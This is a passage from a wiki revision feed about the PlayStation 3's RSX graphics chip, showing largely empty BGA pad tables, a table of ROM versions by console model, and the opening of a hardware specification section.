AJ9 || || <br /> |-<br /> | AJ10 || || <br /> |-<br /> | AJ11 || || <br /> |-<br /> | AJ12 || || <br /> |-<br /> | AJ13 || || <br /> |-<br /> | AJ14 || || <br /> |-<br /> | AJ15 || || <br /> |-<br /> | AJ16 || || <br /> |-<br /> | AJ17 || || <br /> |-<br /> | AJ18 || || <br /> |-<br /> | AJ19 || || <br /> |-<br /> | AJ20 || || <br /> |-<br /> | AJ21 || || <br /> |-<br /> | AJ22 || || <br /> |-<br /> | AJ23 || || <br /> |-<br /> | AJ24 || || <br /> |-<br /> | AJ25 || || <br /> |-<br /> | AJ26 || || <br /> |-<br /> | AJ27 || || <br /> |-<br /> | AJ28 || || <br /> |-<br /> | AJ29 || || <br /> |-<br /> | AJ30 || || <br /> |-<br /> | AJ31 || || <br /> |-<br /> | AJ32 || || <br /> |-<br /> | AJ33 || || <br /> |-<br /> | AJ34 || || <br /> |-<br /> | AJ35 || || <br /> |-<br /> | AJ36 || || <br /> |-<br /> | AJ37 || || <br /> |-<br /> | AJ38 || || <br /> |-<br /> | AJ39 || || <br /> |-<br /> | AJ40 || || <br /> |-<br /> | AJ41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AK<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AK1 || || <br /> |-<br /> | AK2 || || <br /> |-<br /> | AK3 || || <br /> |-<br /> | AK4 || || <br /> |-<br /> | AK5 || || <br /> |-<br /> | AK6 || || <br /> |-<br /> | AK7 || || <br /> |-<br /> | AK8 || || <br /> |-<br /> | AK9 || || <br /> |-<br /> | AK10 || || <br /> |-<br /> | AK11 || || <br /> |-<br /> | AK12 || || <br /> |-<br /> | AK13 || || <br /> |-<br /> | AK14 || || <br /> |-<br /> | AK15 || || <br /> |-<br /> | AK16 || || <br /> |-<br /> | AK17 || || <br /> |-<br /> | AK18 || || <br /> |-<br /> | AK19 || || <br /> |-<br /> | AK20 || || <br /> |-<br /> | AK21 || || <br /> |-<br /> | AK22 || || <br /> |-<br /> | AK23 || || <br /> |-<br /> | AK24 || || <br /> |-<br /> | AK25 || || <br /> |-<br /> | AK26 || || <br /> |-<br /> | AK27 || || <br /> |-<br /> | AK28 || || <br /> |-<br /> | AK29 || || <br /> |-<br /> | AK30 || || <br /> |-<br /> | AK31 || || <br /> |-<br /> | AK32 || || <br /> |-<br /> | AK33 || || <br /> |-<br /> | AK34 || || <br /> |-<br /> | AK35 || || <br /> |-<br /> | AK36 || || <br /> |-<br /> | AK37 || || <br /> |-<br /> | AK38 || || <br /> |-<br /> | AK39 || || <br /> |-<br /> | AK40 || || <br /> |-<br /> | AK41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AL<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AL1 || || <br /> |-<br /> | AL2 || || <br /> |-<br /> | AL3 || || <br /> |-<br /> | AL4 || || <br /> |-<br /> | AL5 || || <br /> |-<br /> | AL6 || || <br /> |-<br /> | AL7 || || <br /> |-<br /> | AL8 || || <br /> |-<br /> | AL9 || || <br /> |-<br /> | AL10 || || <br /> |-<br /> | AL11 || || <br /> |-<br /> | AL12 || || <br /> |-<br /> | AL13 || || <br /> |-<br /> | AL14 || || <br /> |-<br /> | AL15 || || <br /> |-<br /> | AL16 || || <br /> |-<br /> | AL17 || || <br /> |-<br /> | AL18 || || <br /> |-<br /> | AL19 || || <br /> |-<br /> | AL20 || || <br /> |-<br /> | AL21 || || <br /> |-<br /> | AL22 || || <br /> |-<br /> | AL23 || || <br /> |-<br /> | AL24 || || <br /> |-<br /> | AL25 || || <br /> |-<br /> | AL26 || || <br /> |-<br /> | AL27 || || <br /> |-<br /> | AL28 || || <br /> |-<br /> | AL29 || || <br /> |-<br /> | AL30 || || <br /> |-<br /> | AL31 || || <br /> |-<br /> | AL32 || || <br /> |-<br /> | AL33 || || <br /> |-<br /> | AL34 || || <br /> |-<br /> | AL35 || || <br /> |-<br /> | AL36 || || <br /> |-<br /> | AL37 || || <br /> |-<br /> | AL38 || || <br /> |-<br /> | AL39 || || <br /> |-<br /> | AL40 || || <br /> |-<br /> | AL41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AM<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AM1 || || <br /> |-<br /> | AM2 || || <br /> |-<br /> | AM3 || || <br /> |-<br /> | AM4 || || <br /> |-<br /> | AM5 || || <br /> |-<br /> | AM6 || || <br /> |-<br /> | AM7 || || <br /> |-<br /> | AM8 || || <br /> |-<br /> | AM9 || || <br /> |-<br /> | AM10 || || <br /> |-<br /> | AM11 || || <br /> |-<br /> | AM12 || || <br /> |-<br /> | AM13 || || <br /> |-<br /> | AM14 || || <br /> |-<br /> | AM15 || || <br /> |-<br /> | AM16 || || <br /> |-<br /> | AM17 || || <br /> |-<br /> | AM18 || || <br /> |-<br /> | AM19 || || <br /> |-<br /> | AM20 || || <br /> |-<br /> | AM21 || || <br /> |-<br /> | AM22 || || <br /> |-<br /> | AM23 || || <br /> |-<br /> | AM24 || || <br /> |-<br /> | AM25 || || <br /> |-<br /> | AM26 || || <br /> |-<br /> | AM27 || || <br /> |-<br /> | AM28 || || <br /> |-<br /> | AM29 || || <br /> |-<br /> | AM30 || || <br /> |-<br /> | AM31 || || <br /> |-<br /> | AM32 || || <br /> |-<br /> | AM33 || || <br /> |-<br /> | AM34 || || <br /> |-<br /> | AM35 || || <br /> |-<br /> | AM36 || || <br /> |-<br /> | AM37 || || <br /> |-<br /> | AM38 || || <br /> |-<br /> | AM39 || || <br /> |-<br /> | AM40 || || <br /> |-<br /> | AM41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AN<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AN1 || || <br /> |-<br /> | AN2 || || <br /> |-<br /> | AN3 || || <br /> |-<br /> | AN4 || || <br /> |-<br /> | AN5 || || <br /> |-<br /> | AN6 || || <br /> |-<br /> | AN7 || || <br /> |-<br /> | AN8 || || <br /> |-<br /> | AN9 || || <br /> |-<br /> | AN10 || || <br /> |-<br /> | AN11 || || <br /> |-<br /> | AN12 || || <br /> |-<br /> | AN13 || || <br /> |-<br /> | AN14 || || <br /> |-<br /> | AN15 || || <br /> |-<br /> | AN16 || || <br /> |-<br /> | AN17 || || <br /> |-<br /> | AN18 || || <br /> |-<br /> | AN19 || || <br /> |-<br /> | AN20 || || <br /> |-<br /> | AN21 || || <br /> |-<br /> | AN22 || || <br /> |-<br /> | AN23 || || <br /> |-<br /> | AN24 || || <br /> |-<br /> | AN25 || || <br /> |-<br /> | AN26 || || <br /> |-<br /> | AN27 || || <br /> |-<br /> | AN28 || || <br /> |-<br /> | AN29 || || <br /> |-<br /> | AN30 || || <br /> |-<br /> | AN31 || || <br /> |-<br /> | AN32 || || <br /> |-<br /> | AN33 || || <br /> |-<br /> | AN34 || || <br /> |-<br /> | AN35 || || <br /> |-<br /> | AN36 || || <br /> |-<br /> | AN37 || || <br /> |-<br /> | AN38 || || <br /> |-<br /> | AN39 || || <br /> |-<br /> | AN40 || || <br /> |-<br /> | AN41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AP<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AP1 || || <br /> |-<br /> | AP2 || || <br /> |-<br /> | AP3 || || <br /> |-<br /> | AP4 || || <br /> |-<br /> | AP5 || || <br /> |-<br /> | AP6 || || <br /> |-<br /> | AP7 || || <br /> |-<br /> | AP8 || || <br /> |-<br /> | AP9 || || <br /> |-<br /> | AP10 || || <br /> |-<br /> | AP11 || || <br /> |-<br /> | AP12 || || <br /> |-<br /> | AP13 || || <br /> |-<br /> | AP14 || || <br /> |-<br /> | AP15 || || <br /> |-<br /> | AP16 || || <br /> |-<br /> | AP17 || || <br /> |-<br /> | AP18 || || <br /> |-<br /> | AP19 || || <br /> |-<br /> | AP20 || || <br /> |-<br /> | AP21 || || <br /> |-<br /> | AP22 || || <br /> |-<br /> | AP23 || || <br /> |-<br /> | AP24 || || <br /> |-<br /> | AP25 || || <br /> |-<br /> | AP26 || || <br /> |-<br /> | AP27 || || <br /> |-<br /> | AP28 || || <br /> |-<br /> | AP29 || || <br /> |-<br /> | AP30 || || <br /> |-<br /> | AP31 || || <br /> |-<br /> | AP32 || || <br /> |-<br /> | AP33 || || <br /> |-<br /> | AP34 || || <br /> |-<br /> | AP35 || || <br /> |-<br /> | AP36 || || <br /> |-<br /> | AP37 || || <br /> |-<br /> | AP38 || || <br /> |-<br /> | AP39 || || <br /> |-<br /> | AP40 || || <br /> |-<br /> | AP41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AR<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AR1 || || <br /> |-<br /> | AR2 || || <br /> |-<br /> | AR3 || || <br /> |-<br /> | AR4 || || <br /> |-<br /> | AR5 || || <br /> |-<br /> | AR6 || || <br /> |-<br /> | AR7 || || <br /> |-<br /> | AR8 || || <br /> |-<br /> | AR9 || || <br /> |-<br /> | AR10 || || <br /> |-<br /> | AR11 || || <br /> |-<br /> | AR12 || || <br /> |-<br /> | AR13 || || <br /> |-<br /> | AR14 || || <br /> |-<br /> | AR15 || || <br /> |-<br /> | AR16 || || <br /> |-<br /> | AR17 || || <br /> |-<br /> | AR18 || || <br /> |-<br /> | AR19 || || <br /> |-<br /> | AR20 || || <br /> |-<br /> | AR21 || || <br /> |-<br /> | AR22 || || <br /> |-<br /> | AR23 || || <br /> |-<br /> | AR24 || || <br /> |-<br /> | AR25 || || <br /> |-<br /> | AR26 || || <br /> |-<br /> | AR27 || || <br /> |-<br /> | AR28 || || <br /> |-<br /> | AR29 || || <br /> |-<br /> | AR30 || || <br /> |-<br /> | AR31 || || <br /> |-<br /> | AR32 || || <br /> |-<br /> | AR33 || || <br /> |-<br /> | AR34 || || <br /> |-<br /> | AR35 || || <br /> |-<br /> | AR36 || || <br /> |-<br /> | AR37 || || <br /> |-<br /> | AR38 || || <br /> |-<br /> | AR39 || || <br /> |-<br /> | AR40 || || <br /> |-<br /> | AR41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AT<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AT1 || || <br /> |-<br /> | AT2 || || <br /> |-<br /> | AT3 || || <br /> |-<br /> | AT4 || || <br /> |-<br /> | AT5 || || <br /> |-<br /> | AT6 || || <br /> |-<br /> | AT7 || || <br /> |-<br /> | AT8 || || <br /> |-<br /> | AT9 || || <br /> |-<br /> | AT10 || || <br /> |-<br /> | AT11 || || <br /> |-<br /> | AT12 || || <br /> |-<br /> | AT13 || || <br /> |-<br /> | AT14 || || <br /> |-<br /> | AT15 || || <br /> |-<br /> | AT16 || || <br /> |-<br /> | AT17 || || <br /> |-<br /> | AT18 || || <br /> |-<br /> | AT19 || || <br /> |-<br /> | AT20 || || <br /> |-<br /> | AT21 || || <br /> |-<br /> | AT22 || || <br /> |-<br /> | AT23 || || <br /> |-<br /> | AT24 || || <br /> |-<br /> | AT25 || || <br /> |-<br /> | AT26 || || <br /> |-<br /> | AT27 || || <br /> |-<br /> | AT28 || || <br /> |-<br /> | AT29 || || <br /> |-<br /> | AT30 || || <br /> |-<br /> | AT31 || || <br /> |-<br /> | AT32 || || <br /> |-<br /> | AT33 || || <br /> |-<br /> | AT34 || || <br /> |-<br /> | AT35 || || <br /> |-<br /> | AT36 || || <br /> |-<br /> | AT37 || || <br /> |-<br /> | AT38 || || <br /> |-<br /> | AT39 || || <br /> |-<br /> | AT40 || || <br /> |-<br /> | AT41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AU<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AU1 || || <br /> |-<br /> | AU2 || || <br /> |-<br /> | AU3 || || <br /> |-<br /> | AU4 || || <br /> |-<br /> | AU5 || || <br /> |-<br /> | AU6 || || <br /> |-<br /> | AU7 || || <br /> |-<br /> | AU8 || || <br /> |-<br /> | AU9 || || <br /> |-<br /> | AU10 || || <br /> |-<br /> | AU11 || || <br /> |-<br /> | AU12 || || <br /> |-<br /> | AU13 || || <br /> |-<br /> | AU14 || || <br /> |-<br /> | AU15 || || <br /> |-<br /> | AU16 || || <br /> |-<br /> | AU17 || || <br /> |-<br /> | AU18 || || <br /> |-<br /> | AU19 || || <br /> |-<br /> | AU20 || || <br /> |-<br /> | AU21 || || <br /> |-<br /> | AU22 || || <br /> |-<br /> | AU23 || || <br /> |-<br /> | AU24 || || <br /> |-<br /> | AU25 || || <br /> |-<br /> | AU26 || || <br /> |-<br /> | AU27 || || <br /> |-<br /> | AU28 || || <br /> |-<br /> | AU29 || || <br /> |-<br /> | AU30 || || <br /> |-<br /> | AU31 || || <br /> |-<br /> | AU32 || || <br /> |-<br /> | AU33 || || <br /> |-<br /> | AU34 || || <br /> |-<br /> | AU35 || || <br /> |-<br /> | AU36 || || <br /> |-<br /> | AU37 || || <br /> |-<br /> | AU38 || || <br /> |-<br /> | AU39 || || <br /> |-<br /> | AU40 || || <br /> |-<br /> | AU41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AV<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AV1 || || <br /> |-<br /> | AV2 || || <br /> |-<br /> | AV3 || || <br /> |-<br /> | AV4 || || <br /> |-<br /> | AV5 || || <br /> |-<br /> | AV6 || || <br /> |-<br /> | AV7 || || <br /> |-<br /> | AV8 || || <br /> |-<br /> | AV9 || || <br /> |-<br /> | AV10 || || <br /> |-<br /> | AV11 || || <br /> |-<br /> | AV12 || || <br /> |-<br /> | AV13 || || <br /> |-<br /> | AV14 || || <br /> |-<br /> | AV15 || || <br /> |-<br /> | AV16 || || <br /> |-<br /> | AV17 || || <br /> |-<br /> | AV18 || || <br /> |-<br /> | AV19 || || <br /> |-<br /> | AV20 || || <br /> |-<br /> | AV21 || || <br /> |-<br /> | AV22 || || <br /> |-<br /> | AV23 || || <br /> |-<br /> | AV24 || || <br /> |-<br /> | AV25 || || <br /> |-<br /> | AV26 || || <br /> |-<br /> | AV27 || || <br /> |-<br /> | AV28 || || <br /> |-<br /> | AV29 || || <br /> |-<br /> | AV30 || || <br /> |-<br /> | AV31 || || <br /> |-<br /> | AV32 || || <br /> |-<br /> | AV33 || || <br /> |-<br /> | AV34 || || <br /> |-<br /> | AV35 || || <br /> |-<br /> | AV36 || || <br /> |-<br /> | AV37 || || <br /> |-<br /> | AV38 || || <br /> |-<br /> | AV39 || || <br /> |-<br /> | AV40 || || <br /> |-<br /> | AV41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AW<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AW1 || || <br /> |-<br /> | AW2 || || <br /> |-<br /> | AW3 || || <br /> |-<br /> | AW4 || || <br /> |-<br /> | AW5 || || <br /> |-<br /> | AW6 || || <br /> |-<br /> | AW7 || || <br /> |-<br /> | AW8 || || <br /> |-<br /> | AW9 || || <br /> |-<br /> | AW10 || || <br /> |-<br /> | AW11 || || <br /> |-<br /> | AW12 || || <br /> |-<br /> | AW13 || || <br /> |-<br /> | AW14 || || <br /> |-<br /> | AW15 || || <br /> |-<br /> | AW16 || || <br /> |-<br /> | AW17 || || <br /> |-<br /> | AW18 || || <br /> |-<br /> | AW19 || || <br /> |-<br /> | AW20 || || <br /> |-<br /> | AW21 || || <br /> |-<br /> | AW22 || || <br /> |-<br /> | AW23 || || <br /> |-<br /> | AW24 || || <br /> |-<br /> | AW25 || || <br /> |-<br /> | AW26 || || <br /> |-<br /> | AW27 || || <br /> |-<br /> | AW28 || || <br /> |-<br /> | AW29 || || <br /> |-<br /> | AW30 || || <br /> |-<br /> | AW31 || || <br /> |-<br /> | AW32 || || <br /> |-<br /> | AW33 || || <br /> |-<br /> | AW34 || || <br /> |-<br /> | AW35 || || <br /> |-<br /> | AW36 || || <br /> |-<br /> | AW37 || || <br /> |-<br /> | AW38 || || <br /> |-<br /> | AW39 || || <br /> |-<br /> | AW40 || || <br /> |-<br /> | AW41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AY<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AY1 || || <br /> |-<br /> | AY2 || || <br /> |-<br /> | AY3 || || <br /> |-<br /> | AY4 || || <br /> |-<br /> | AY5 || || <br /> |-<br /> | AY6 || || <br /> |-<br /> | AY7 || || <br /> |-<br /> | AY8 || || <br /> |-<br /> | AY9 || || <br /> |-<br /> | AY10 || || <br /> |-<br /> | AY11 || || <br /> |-<br /> | AY12 || || <br /> |-<br /> | AY13 || || <br /> |-<br /> | AY14 || || <br /> |-<br /> | AY15 || || <br /> |-<br /> | AY16 || || <br /> |-<br /> | AY17 || || <br /> |-<br /> | AY18 || || <br /> |-<br /> | AY19 || || <br /> |-<br /> | AY20 || || <br /> |-<br /> | AY21 || || <br /> |-<br /> | AY22 || || <br /> |-<br /> | AY23 || || <br /> |-<br /> | AY24 || || <br /> |-<br /> | AY25 || || <br /> |-<br /> | AY26 || || <br /> |-<br /> | AY27 || || <br /> |-<br /> | AY28 || || <br /> |-<br /> | AY29 || || <br /> |-<br /> | AY30 || || <br /> |-<br /> | AY31 || || <br /> |-<br /> | AY32 || || <br /> |-<br /> | AY33 || || <br /> |-<br /> | AY34 || || <br /> |-<br /> | AY35 || || <br /> |-<br /> | AY36 || || <br /> |-<br /> | AY37 || || <br /> |-<br /> | AY38 || || <br /> |-<br /> | AY39 || || <br /> |-<br /> | AY40 || || <br /> |-<br /> | AY41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AZ<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AZ1 || || <br /> |-<br /> | AZ2 || || <br /> |-<br /> | AZ3 || || <br /> |-<br /> | AZ4 || || <br /> |-<br /> | AZ5 || || <br /> |-<br /> | AZ6 || || <br /> |-<br /> | AZ7 || || <br /> |-<br /> | AZ8 || || <br /> |-<br /> | AZ9 || || <br /> |-<br /> | AZ10 || || <br /> |-<br /> | AZ11 || || <br /> |-<br /> | AZ12 || || <br /> |-<br /> | AZ13 || || <br /> |-<br /> | AZ14 || || <br /> |-<br /> | AZ15 || || <br /> |-<br /> | AZ16 || || <br /> |-<br /> | AZ17 || || <br /> |-<br /> | AZ18 || || <br /> |-<br /> | AZ19 || || <br /> |-<br /> | AZ20 || || <br /> |-<br /> | AZ21 || || <br /> |-<br /> | AZ22 || || <br /> |-<br /> | AZ23 || || <br /> |-<br /> | AZ24 || || <br /> |-<br /> | AZ25 || || <br /> |-<br /> | AZ26 || || <br /> |-<br /> | AZ27 || || <br /> |-<br /> | AZ28 || || <br /> |-<br /> | AZ29 || || <br /> |-<br /> | AZ30 || || <br /> |-<br /> | AZ31 || || <br /> |-<br /> | AZ32 || || <br /> |-<br /> | AZ33 || || <br /> |-<br /> | AZ34 || || <br /> |-<br /> | AZ35 || || <br /> |-<br /> | AZ36 || || <br /> |-<br /> | AZ37 || || <br /> |-<br /> | AZ38 || || <br /> |-<br /> | AZ39 || || <br /> |-<br /> | AZ40 || || <br /> |-<br /> | AZ41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | BA<br /> |-! Pad # !! Name !! Description<br /> |-<br /> | BA1 || ||<br /> |-<br /> | BA2 || ||<br /> |-<br /> | BA3 || ||<br /> |-<br /> | BA4 || ||<br /> |-<br /> | BA5 || ||<br /> |-<br /> | BA6 || ||<br /> |-<br /> | BA7 || ||<br /> |-<br /> | BA8 || || <br /> |-<br /> | BA9 || ||<br /> |-<br /> | BA10 || || <br /> |-<br /> | BA11 || ||<br /> |-<br /> | BA12 || || <br /> |-<br /> | BA13 || ||<br /> |-<br /> | BA14 || || <br /> |-<br /> | BA15 || || <br /> |-<br /> | BA16 || || <br /> |-<br /> | BA17 || || <br /> |-<br /> | BA18 || || <br /> |-<br /> | BA19 || || <br /> |-<br /> | BA20 || || <br /> |-<br /> | BA21 || || <br /> |-<br /> | BA22 || || <br /> |-<br /> | BA23 || || <br /> |-<br /> | BA24 || || <br /> |-<br /> | BA25 || || <br /> |-<br /> | BA26 || || <br /> |-<br /> | BA27 || || <br /> |-<br /> | BA28 || || <br /> |-<br /> | BA29 || || <br /> |-<br /> | BA30 || || <br /> |-<br /> | BA31 || || <br /> |-<br /> | BA32 || || <br /> |-<br /> | BA33 || || <br /> |-<br /> | BA34 || || <br /> |-<br /> | BA35 || || <br /> |-<br /> | BA36 || || <br /> |-<br /> | BA37 || || <br /> |-<br /> | BA38 || || <br /> |-<br /> | BA39 || || <br /> |-<br /> | BA40 || || <br /> |-<br /> | BA41 || || <br /> |-<br /> |}<br /> ''remark: the following Pad #letter's are not used: I, O, Q, S, X, Z, AI, AO, AQ, AS, AX, AZ''<br /> &lt;/div&gt;<br /> <br /> <br /> <br /> ----<br /> Some I2C thermo experiments from Cell/RSX/board are referenced here: http://stefde69.blogspot.com/2011_05_01_archive.html<br /> <br /> == Rom Versions ==<br /> <br /> {| class=&quot;wikitable sortable&quot;<br /> ! Rom Version !! RSX Serial !! PS3 Model !! PS3 Prod. Date !! Notes<br /> |-<br /> | a01 || ? || [[DEH-R1000]]? || ? ||<br /> |-<br /> | rowspan=&quot;2&quot; | a02 || rowspan=&quot;2&quot; | ? || [[DEH-R1010]]? || ? ||<br /> |-<br /> | [[DEH-R1020]]? || ? ||<br /> |- bgcolor=&quot;#CCCCCC&quot;<br /> | colspan=&quot;5&quot; |<br /> |-<br /> | rowspan=&quot;5&quot; | b01 || rowspan=&quot;5&quot; | [[CXD2971GB]] || [[DEH-R1030]]? || ? ||<br /> |-<br /> | [[DEH-R1040]]? || ? || <br /> |-<br /> | [[DEH-H1001-D]] || June 2006 || <br /> |-<br /> | [[DECR-1000]] || June/July/August 2006 || <br /> |-<br /> | [[DEH-H1000A|DEH-H1000]] || ? || <br /> |-<br /> | b02? || [[CXD2971GB]]? || [[CBEH-1000-D]] || ? ||<br /> |-<br /> | b02 || [[CXD2971GB]] || [[DECR-1000]] || ? || <br /> |-<br /> | b03 || [[CXD2971GB]] || [[DECR-1000]] || January 2007 ||<br /> |- bgcolor=&quot;#CCCCCC&quot;<br /> | colspan=&quot;5&quot; |<br /> |-<br /> | b07 || [[CXD2971GB]]? || [[DECR-1000]] || ? ||<br /> |-<br /> | b08 || ? || [[CECHAxx]] || ? ||<br /> |-<br /> | b08 || ? || [[DECHA00A]] || January 2007 ||<br /> |- bgcolor=&quot;#CCCCCC&quot;<br /> | colspan=&quot;5&quot; |<br /> |-<br /> | rowspan=&quot;3&quot; | rsx65 a03 || rowspan=&quot;3&quot; | [[CXD2991GB]] || [[DEH-FH1500J-A]] || April 2008 ||<br /> |-<br /> | [[DEH-FH1500J-B]] || ? ||<br /> |-<br /> | [[CBEH-F1501-B]] || ? ||<br /> |-<br /> | rsx65 a06 || ? || [[DECR-1400]] || June 2009 ||<br /> |-<br /> | rsx65 a06 || ? || [[DECH-2000A]] || September 2009 ||<br /> |-<br /> | rsx40 a01 || ? || [[CECH-2500]] || ? ||<br /> |-<br /> |}</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=RSX&diff=46045 RSX 2017-09-02T17:10:14Z <p>Mathieulh: /* ROM Versions */ Added more rom versions</p> <hr /> <div>&lt;div style=&quot;float:right&quot;&gt;[[File:SCEI CXD2971DGB.JPG|200px|thumb|left|RSX - Reality Synthesizer&lt;br /&gt;1st generation 90nm&lt;br /&gt;CXD2971DGB]]&lt;br /&gt;[[File:RSX 90nm without IHS.jpg|200px|thumb|left||RSX - Reality Synthesizer&lt;br /&gt;1st generation 90nm&lt;br /&gt;CXD2971AGB without IHS]]&lt;br /&gt;[[File:RSX-GDDR-BGA-lifted.jpg|200px|thumb|left|RSX - Reality Synthesizer&lt;br /&gt;GDDR3 BGA lifted]]&lt;br /&gt;[[File:RSX-GPUcore-lifted.jpg|200px|thumb|left|RSX - Reality Synthesizer&lt;br /&gt;GPUcore BGA lifted]]&lt;br /&gt;[[File:RSX-BGA-lifted-missingpads.jpg|200px|thumb|left|RSX - Reality Synthesizer&lt;br /&gt;BGA lifted&lt;br /&gt;PCB underneath]]&lt;br /&gt;[[File:Nvidia-Die-G70.png|200px|thumb|left|Nvidia G70 die shot]]&lt;br/&gt;[[File:RSX die - Image made by Héctor Martín.jpg|200px|thumb|left|RSX die, scraped with razorblade by Héctor Martín]]&lt;br/&gt;[[File:BGA_crack1.jpg|200px|thumb|left|BGA Cracking (one of the reasons for YLOD error)]]&lt;/div&gt;<br /> <br /> = RSX - Reality Synthesizer =<br /> <br /> The RSX 'Reality Synthesizer' is a proprietary graphics processing unit (GPU) codeveloped by Nvidia and Sony for the PlayStation 3 game console. It is a GPU based on the Nvidia 7800GTX graphics processor and, according to Nvidia, is a G70/G71 (previously known as NV47) hybrid architecture with some modifications. The RSX has separate vertex and pixel shader pipelines. The GPU makes use of 256 MB GDDR3 RAM clocked at 650&lt;!--// NOT 700!!!//--&gt; MHz with an effective transmission rate of 1.4 GHz and up to 224 MB of the 3.2 GHz XDR main memory via the CPU (480 MB max).<br /> <br /> == Specifications ==<br /> * &lt;abbr title=&quot;dmesg|grep rsx :: ps3rsx: version 2.11 RSX rev17 0MB RAM channel 1 core 500MHz mem 650MHz&quot;&gt;500&lt;/abbr&gt;&amp;nbsp;MHz on 90 nm process (shrunk to 65 nm in 2008 and to 40 nm in 2010)<br /> * Based on NV47 Chip (Nvidia GeForce 7800 Architecture)<br /> ** early development tools had NV47 with 256 bit local memory interface and 16 ROPs<br /> ** later RSX with 128bit local memory interface and 8 ROPs<br /> * Little Endian<br /> ** 300+ million transistors<br /> ** Multi-way programmable parallel floating-point shader pipelines<br /> *** Independent pixel/vertex shader architecture<br /> *** 24 parallel pixel-shader ALU pipes clocked @ 550 MHz<br /> **** 5 ALU operations per pipeline, per cycle (2 vector&lt;sub&gt;4&lt;/sub&gt; , 2 scalar/dual/co-issue and fog ALU, 1 Texture ALU)<br /> **** 27 floating-point operations per pipeline, per cycle<br /> *** 8 parallel vertex pipelines<br /> **** 2 ALU operations per pipeline, per cycle (1 vector&lt;sub&gt;4&lt;/sub&gt; and 1 scalar, dual issue)<br /> **** 10 FLOPS per pipeline, per cycle<br /> *** Floating Point Operations: 400.4 Gigaflops ((24 * 27 Flops + 8 * 10 Flops) * 550)<br /> ** 24 texture filtering units (TF) and 8 vertex texture addressing units (TA)<br /> *** 24 filtered samples per clock<br /> **** Maximum Texel fillrate: 12.0 GigaTexels per second (24 textures * 500&amp;nbsp;MHz)<br /> *** 32 unfiltered texture samples per clock, ( 8 TA x 4 texture samples )<br /> ** 8 Render Output units / pixel rendering pipelines<br /> *** Peak pixel fillrate (theoretical): 4.0 Gigapixel per second<br /> *** Maximum Z-buffering sample rate: 8.0 GigaSamples per second (2 Z-samples * 8 ROPs * 500&amp;nbsp;MHz)<br /> ** Maximum Dot product operations: 51 billion per second (combined with Cell CPU)<br /> ** 128-bit pixel precision offers rendering of scenes with High dynamic range rendering<br /> ** 256 MB GDDR3 RAM at &lt;abbr title=&quot;dmesg|grep rsx :: ps3rsx: version 2.11 RSX rev17 0MB RAM channel 1 core 500MHz mem 650MHz&quot;&gt;650&amp;nbsp;MHz&lt;/abbr&gt;&lt;!--// NOT 700 !! //--&gt;<br /> *** Earlier PS3 Models: Samsung K4J52324QC-SC14 rated max 700MHz<br /> *** Later PS3 Models: Qimonda HYB18H512322AF-14 (seen on CXD2971DGB)<br /> *** 128-bit memory bus width<br /> *** 22.4 GB/s read and write bandwidth<br /> ** Cell FlexIO bus interface<br /> *** Rambus XDR Memory interface bus width: 56bit out of 64bit (serial)<br /> *** 20 GB/s read to the Cell and XDR memory<br /> *** 15 GB/s write to the Cell and XDR memory<br /> ** Support for PSGL (OpenGL ES 1.1 + Nvidia Cg)<br /> ** Support for S3 Texture Compression<br /> <br /> <br /> <br /> More features are revealed in the following chart delineating the differences between the RSX and the nVidia 7800 GTX.<br /> <br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! Difference !! RSX !! nVidia 7800GTX<br /> |-<br /> | GDDR3 Memory bus || 128bit || 256bit<br /> |-<br /> | ROPs || 8 || 16<br /> |-<br /> | Post Transform and Lighting Cache || 63 max vertices || 45 max vertices<br /> |-<br /> | Total Texture Cache Per Quad of Pixel Pipes (L1 and L2) || 96kB || 48kB<br /> |-<br /> | CPU interface || FlexIO || PCI-Express 16x<br /> |-<br /> | Technology || 40nm/65nm/90nm || 110nm<br /> |-<br /> |}<br /> <br /> Other RSX features/differences include:<br /> <br /> More shader instructions<br /> Extra texture lookup logic (helps RSX transport data from XDR)<br /> Fast vector normalize <br /> <br /> Note that the cache (Post Transform and Lighting Vertext Cache) is located between the vector shader and the triangle setup.<br /> <br /> A sample flow of data inside the RSX would see them first processed by 8 vertex shaders. The output are then sent to the 24 active pixel shaders, which can involve the 24 active texture units. Finally, the data is passed to the 8 Raster Operation Pipeline units (ROPs), and on out to the GDDR3. Note that the pixel shaders are grouped into groups of four (called Quads). There are 7 Quads, with 1 redundant, leaving 6 Quads active, which provides us with the 24 active pixel shaders listed above (6 times 4 equals 24). Since each Quad has 96kB of L1 and L2 